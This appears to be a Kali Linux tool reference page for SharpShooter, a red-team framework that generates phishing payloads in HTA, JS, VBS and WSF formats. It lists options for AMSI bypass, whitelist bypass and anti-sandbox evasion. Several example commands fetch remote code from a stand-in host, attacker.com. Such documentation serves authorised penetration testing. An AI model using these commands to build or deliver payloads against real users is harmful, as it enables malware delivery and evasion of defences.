Social Engineeringpayloadcsharphtajsvbswsfphishingbypass

SharpShooter

SharpShooter is a payload creation framework for retrieving and executing arbitrary C# source code. It generates payloads in formats including HTA, JS, VBS, and WSF.

Description

SharpShooter is designed for red team operations and penetration testing, enabling the creation of sophisticated payloads that can evade detection. The tool specializes in generating executable C# code through various file formats commonly used in phishing campaigns.

Use cases include crafting stageless payloads, implementing application whitelist bypass techniques, and employing anti-sandbox evasion methods. It's particularly valuable for social engineering attacks where JavaScript, VBScript, or HTA files are delivered to targets.

The framework supports multiple staging techniques via COM objects and .NET versions, making it versatile for different Windows environments. Integration with OffSec's PEN-300 training highlights its role in advanced phishing simulations.

How It Works

SharpShooter generates payloads that download and execute C# source code from remote locations using HTTP/HTTPS or DNS channels. It leverages COM staging (outlook, wmi, wscript), application whitelist bypasses (wmic, regsvr32), and anti-analysis techniques. Payloads are minified and obfuscated, targeting specific .NET versions (2.0 or 4.0) and supporting formats like HTA, JS, VBS, WSF for execution in common Windows interpreters.

Installation

bash

sudo apt install sharpshooter

Flags

--stagelessCreate a stageless payload

--dotnetver <ver>Target .NET Version: 2 or 4

--com <com>COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote

--awl <awl>Application Whitelist Bypass Technique: wmic, regsvr32

--awlurl <awlurl>URL to retrieve XSL/SCT payload

--payload <format>Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk

--sandbox <types>Anti-sandbox techniques

--amsi <amsi>AMSI bypass technique

--delivery <type>Delivery method

--rawscfile <path>Path to raw shellcode file

--shellcodeUse shellcode payload

--scfile <path>Path to shellcode file

--refs <refs>Additional .NET references

--namespace <ns>C# namespace

--entrypoint <ep>C# entrypoint method

--web <web>Web payload URL

--dns <dns>DNS payload domain

--output <output>Output filename

--smuggleEnable payload smuggling

--template <tpl>Custom template path

Examples

Show help message and usage options

sharpshooter -h

Generate stageless HTA payload

sharpshooter --stageless --payload hta --output payload.hta

Create JS payload targeting .NET 4 from web URL

sharpshooter --dotnetver 4 --payload js --web http://attacker.com/payload.txt --output payload.js

Generate VBS payload using WMI COM staging

sharpshooter --com wmi --payload vbs --output payload.vbs

Create JS payload with WMIC application whitelist bypass

sharpshooter --awl wmic --awlurl http://attacker.com/style.xsl --payload js

Generate WSF payload with anti-sandbox techniques

sharpshooter --payload wsf --sandbox basic --output payload.wsf

Create HTA payload from shellcode file

sharpshooter --shellcode --scfile shellcode.bin --payload hta

Updated 2026-04-16kali.org ↗